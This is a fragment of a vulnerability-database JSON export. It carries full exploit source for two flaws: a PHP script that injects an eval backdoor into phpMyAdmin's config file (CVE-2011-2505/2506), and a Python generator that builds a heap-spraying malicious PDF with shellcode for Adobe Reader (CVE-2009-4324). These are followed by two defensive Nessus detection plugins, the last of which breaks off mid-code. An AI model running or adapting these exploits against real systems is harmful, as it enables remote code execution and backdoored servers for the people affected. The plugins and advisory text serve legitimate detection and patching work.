Date: 2011-07-09\r\n# Author: Mango of ha.xxor.se\r\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1\r\n# CVE : CVE-2011-2505, CVE-2011-2506\r\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\r\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n*/\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n .\r\n , )\\ .\r\n . ,/) , / ) , )\\\r\n )\\( /)/( (__( /( / ) __ __ ________ __ __\r\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\r\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\r\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\r\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\r\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \r\n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\r\n Remote Code Injection [] [][] [] [] [] [] [] []\r\n http://ha.xxor.se [][] [] [] [] [][] [][] [] []\r\n _ _ ___ __ ____ __ ___ ___ \r\n | |-| || _ |\\ /\\ /| _ || ) \r\n |_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \r\n ___ ___ ___ _ _ ___ ___ __ __ \r\n ( < | [_ / /| || || )(_)| |\\ | /\r\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\r\n \r\nUse responsibly.\r\n \r\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\r\n \r\nif(php_sapi_name()==='cli'){\r\n if(!isset($argv[1])){\r\n output(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\");\r\n killme();\r\n }\r\n $pmaurl = $argv[1];\r\n}else{\r\n $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\r\n}\r\n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);';\r\n$cookie = null;\r\n$token = null;\r\nif(!function_exists('curl_init')){\r\n output('[!] Fatal error. 
Need cURL!');\r\n killme();\r\n}\r\n$ch = curl_init();\r\n$debug = 0;\r\nif(php_sapi_name()!=='cli'){\r\n?>\r\n<form method=post>\r\nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\r\n<input name=submit type=submit value=\u00e2\u2122\u00a5>\r\n</form>\r\n<pre>\r\n<?php\r\nif(!isset($_REQUEST['submit']))killme(true);\r\n}\r\n \r\noutput(\"[i] Running...\");\r\n \r\n// Start a session and get a token\r\ncurl_setopt_array($ch, array(\r\n CURLOPT_URL => $pmaurl.'/setup/index.php',\r\n CURLOPT_HEADER => 1,\r\n CURLOPT_RETURNTRANSFER => 1,\r\n CURLOPT_TIMEOUT => 4,\r\n CURLOPT_SSL_VERIFYPEER => false,\r\n CURLOPT_SSL_VERIFYHOST => false\r\n));\r\noutput(\"[*] Contacting server to retrive session cookie and token.\");\r\n \r\n$result = curl_exec($ch);\r\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\r\n output(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\");\r\n killme();\r\n}\r\nif(!$result){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\nif(false !== strpos($result, 'Cannot load or save configuration')){\r\n output(\"[!] Fail. Host not vulnerable. 
Web server writable folder $pmaurl/config/ does not exsist.\");\r\n killme();\r\n}\r\n \r\n// Extract cookie\r\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\r\n$cookie = $matches[1];\r\noutput(\"[i] Cookie:\".$cookie);\r\n// Extract token\r\npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches);\r\n$token = $matches[2];\r\noutput(\"[i] Token:\".$token);\r\n \r\n// Poison _SESSION variable\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\r\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\r\noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\n \r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n \r\n// Save file\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\r\ncurl_setopt($ch, CURLOPT_POST, 1);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\r\noutput(\"[*] Contacting server to make it save the injected code to a file.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\n \r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n \r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\r\ncurl_setopt($ch, CURLOPT_POST, 0);\r\noutput(\"[*] Contacting server to test if the injected code executes.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\r\n output(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\");\r\n output(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\");\r\n}else{\r\n output(\"[!] Code injection failed. 
This instance of phpMyAdmin does not apear to be vulnerable.\");\r\n}\r\n \r\n \r\ncurl_close($ch);\r\n \r\nfunction output($msg){\r\n echo php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\";\r\n flush();\r\n}\r\n \r\nfunction killme(){\r\n output(\"[*] Exiting...\");\r\n echo php_sapi_name()!=='cli'?'<pre>':'';\r\n die();\r\n}\r\n \r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n\r\n\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16503"}], "seebug": [{"lastseen": "2017-11-19T16:13:06", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67248", "id": "SSV:67248", "title": "Adobe Reader and Acrobat", "type": "seebug", "sourceData": "\n #\r\n# Author : Ahmed Obied (ahmed.obied@gmail.com)\r\n#\r\n# This program generates a PDF file that exploits a vulnerability (CVE-2009-4324) \r\n# in Adobe Reader and Acrobat. The generated PDF file was tested using Adobe \r\n# Reader 9.2.0 on Windows XP SP3. 
The exploit's payload spawns the calculator.\r\n#\r\n# Usage : python adobe_newplayer.py [output file name]\r\n# \r\n\r\nimport sys\r\n\r\nclass PDF:\r\n \r\n def __init__(self):\r\n self.xrefs = []\r\n self.eol = '\\x0d\\x0a'\r\n self.content = ''\r\n self.xrefs_offset = 0\r\n \r\n def header(self):\r\n self.content += '%PDF-1.1' + self.eol \r\n \r\n def obj(self, obj_num, data):\r\n self.xrefs.append(len(self.content))\r\n self.content += '%d 0 obj' % obj_num\r\n self.content += self.eol + '<< ' + data + ' >>' + self.eol\r\n self.content += 'endobj' + self.eol\r\n \r\n def ref(self, ref_num):\r\n return '%d 0 R' % ref_num \r\n \r\n def xref(self):\r\n self.xrefs_offset = len(self.content)\r\n self.content += 'xref' + self.eol\r\n self.content += '0 %d' % (len(self.xrefs) + 1)\r\n self.content += self.eol\r\n self.content += '0000000000 65535 f' + self.eol\r\n for i in self.xrefs:\r\n self.content += '%010d 00000 n' % i\r\n self.content += self.eol\r\n \r\n def trailer(self):\r\n self.content += 'trailer' + self.eol\r\n self.content += '<< /Size %d' % (len(self.xrefs) + 1)\r\n self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol\r\n self.content += 'startxref' + self.eol\r\n self.content += '%d' % self.xrefs_offset\r\n self.content += self.eol\r\n self.content += '%%EOF'\r\n \r\n def generate(self): \r\n return self.content\r\n\r\nclass Exploit:\r\n \r\n def convert_to_utf16(self, payload):\r\n enc_payload = ''\r\n for i in range(0, len(payload), 2):\r\n num = 0\r\n for j in range(0, 2):\r\n num += (ord(payload[i + j]) & 0xff) << (j * 8)\r\n enc_payload += '%%u%04x' % num\r\n return enc_payload\r\n \r\n def get_payload(self):\r\n # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub\r\n # http://metasploit.com\r\n payload = '\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x6f'\r\n payload += '\\x02\\xb1\\x0e\\x83\\xeb\\xfc\\xe2\\xf4\\x93\\xea\\xf5\\x0e\\x6f\\x02\\x3a\\x4b'\r\n payload += 
'\\x53\\x89\\xcd\\x0b\\x17\\x03\\x5e\\x85\\x20\\x1a\\x3a\\x51\\x4f\\x03\\x5a\\x47'\r\n payload += '\\xe4\\x36\\x3a\\x0f\\x81\\x33\\x71\\x97\\xc3\\x86\\x71\\x7a\\x68\\xc3\\x7b\\x03'\r\n payload += '\\x6e\\xc0\\x5a\\xfa\\x54\\x56\\x95\\x0a\\x1a\\xe7\\x3a\\x51\\x4b\\x03\\x5a\\x68'\r\n payload += '\\xe4\\x0e\\xfa\\x85\\x30\\x1e\\xb0\\xe5\\xe4\\x1e\\x3a\\x0f\\x84\\x8b\\xed\\x2a'\r\n payload += '\\x6b\\xc1\\x80\\xce\\x0b\\x89\\xf1\\x3e\\xea\\xc2\\xc9\\x02\\xe4\\x42\\xbd\\x85'\r\n payload += '\\x1f\\x1e\\x1c\\x85\\x07\\x0a\\x5a\\x07\\xe4\\x82\\x01\\x0e\\x6f\\x02\\x3a\\x66'\r\n payload += '\\x53\\x5d\\x80\\xf8\\x0f\\x54\\x38\\xf6\\xec\\xc2\\xca\\x5e\\x07\\x7c\\x69\\xec'\r\n payload += '\\x1c\\x6a\\x29\\xf0\\xe5\\x0c\\xe6\\xf1\\x88\\x61\\xd0\\x62\\x0c\\x2c\\xd4\\x76'\r\n payload += '\\x0a\\x02\\xb1\\x0e'\r\n return self.convert_to_utf16(payload)\r\n \r\n def get_exploit(self):\r\n exploit = '''\r\n \r\n function spray_heap()\r\n {\r\n var chunk_size, payload, nopsled;\r\n \r\n chunk_size = 0x8000;\r\n payload = unescape("<PAYLOAD>");\r\n nopsled = unescape("<NOP>");\r\n while (nopsled.length < chunk_size)\r\n nopsled += nopsled;\r\n nopsled_len = chunk_size - (payload.length + 20); \r\n nopsled = nopsled.substring(0, nopsled_len);\r\n heap_chunks = new Array();\r\n for (var i = 0 ; i < <CHUNKS> ; i++)\r\n heap_chunks[i] = nopsled + payload;\r\n } \r\n \r\n function trigger_bug()\r\n {\r\n util.printd("1.000000000000000000000000 : 0000000", new Date());\r\n try {\r\n media.newPlayer(null);\r\n } catch(e) {}\r\n util.printd("1.000000000000000000000000 : 0000000", new Date());\r\n }\r\n \r\n spray_heap();\r\n trigger_bug();\r\n \r\n '''\r\n exploit = exploit.replace('<PAYLOAD>', self.get_payload())\r\n exploit = exploit.replace('<NOP>', '%u0d0d%u0d0d')\r\n exploit = exploit.replace('<CHUNKS>', '1200') \r\n return exploit \r\n \r\ndef generate_pdf():\r\n exploit = Exploit()\r\n pdf = PDF()\r\n pdf.header()\r\n pdf.obj(1, '/Type /Catalog /Outlines ' + pdf.ref(2) + ' /Pages ' + 
pdf.ref(3) + ' /OpenAction ' + pdf.ref(5))\r\n pdf.obj(2, '/Type /Outlines /Count 0') \r\n pdf.obj(3, '/Type /Pages /Kids [' + pdf.ref(4) + '] /Count 1')\r\n pdf.obj(4, '/Type /Page /Parent ' + pdf.ref(3) + ' /MediaBox [0 0 612 792]')\r\n pdf.obj(5, '/Type /Action /S /JavaScript /JS (%s)' % exploit.get_exploit()) \r\n pdf.xref()\r\n pdf.trailer()\r\n return pdf.generate()\r\n \r\ndef main():\r\n if len(sys.argv) != 2:\r\n print 'Usage: python %s [output file name]' % sys.argv[0]\r\n sys.exit(0)\r\n file_name = sys.argv[1]\r\n if not file_name.endswith('.pdf'):\r\n file_name = file_name + '.pdf'\r\n try:\r\n fd = open(file_name, 'w')\r\n fd.write(generate_pdf()) \r\n fd.close()\r\n print '[-] PDF file generated and written to %s' % file_name\r\n except IOError:\r\n print '[*] Error : An IO error has occurred'\r\n print '[-] Exiting ...'\r\n sys.exit(-1)\r\n \r\nif __name__ == '__main__':\r\n main()\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67248"}], "nessus": [{"lastseen": "2019-12-13T08:52:59", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues and three\nbugs are now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. 
A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs :\n\n* the acroread process continued to run even after closing a PDF file.\nIf multiple PDF files were opened and then closed, the acroread\nprocesses continued to run and consume system resources (up to 100%\nCPU usage). With this update, the acroread process correctly exits,\nwhich resolves this issue. (BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash\nwhen attempting to open signed PDF files. For such files, if an\nimmediate crash was not observed, clicking on the Signature Panel\ncould trigger one. With this update, the PPKLite.api plug-in is\nincluded, which resolves this issue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues and fixes these bugs. All running instances of Adobe\nReader must be restarted for the update to take effect.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2010-0037.NASL", "href": "https://www.tenable.com/plugins/nessus/63911", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : acroread (RHSA-2010:0037)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0037. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63911);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37756, 37757, 37758, 37761, 37763);\n script_xref(name:\"RHSA\", value:\"2010:0037\");\n\n script_name(english:\"RHEL 5 : acroread (RHSA-2010:0037)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues and three\nbugs are now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs :\n\n* the acroread process continued to run even after closing a PDF file.\nIf multiple PDF files were opened and then closed, the acroread\nprocesses continued to run and consume system resources (up to 100%\nCPU usage). With this update, the acroread process correctly exits,\nwhich resolves this issue. 
(BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash\nwhen attempting to open signed PDF files. For such files, if an\nimmediate crash was not observed, clicking on the Signature Panel\ncould trigger one. With this update, the PPKLite.api plug-in is\nincluded, which resolves this issue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues and fixes these bugs. All running instances of Adobe\nReader must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3954\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3955\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3959\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4324\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-02.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0037\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0037\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-9.3-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el5\")) flag++;\n\n\n if (flag)\n {\n 
security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:53:00", "bulletinFamily": "scanner", "description": "The acroread packages as shipped in Red Hat Enterprise Linux 3 Extras\ncontain security flaws and should not be used.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should\nno longer be used. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. Adobe\nReader 9 for Linux is not compatible with Red Hat Enterprise Linux 3.\nAn alternative PDF file viewer available in Red Hat Enterprise Linux 3\nis xpdf.\n\nThis update removes the acroread packages due to their known security\nvulnerabilities.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2010-0060.NASL", "href": "https://www.tenable.com/plugins/nessus/63914", "published": "2013-01-24T00:00:00", "title": "RHEL 3 : acroread (RHSA-2010:0060)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0060. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63914);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37758);\n script_xref(name:\"RHSA\", value:\"2010:0060\");\n\n script_name(english:\"RHEL 3 : acroread (RHSA-2010:0060)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The acroread packages as shipped in Red Hat Enterprise Linux 3 Extras\ncontain security flaws and should not be used.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should\nno longer be used. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. 
Adobe\nReader 9 for Linux is not compatible with Red Hat Enterprise Linux 3.\nAn alternative PDF file viewer available in Red Hat Enterprise Linux 3\nis xpdf.\n\nThis update removes the acroread packages due to their known security\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0060.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread-uninstall package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-uninstall\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"acroread-uninstall-9.3-3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else 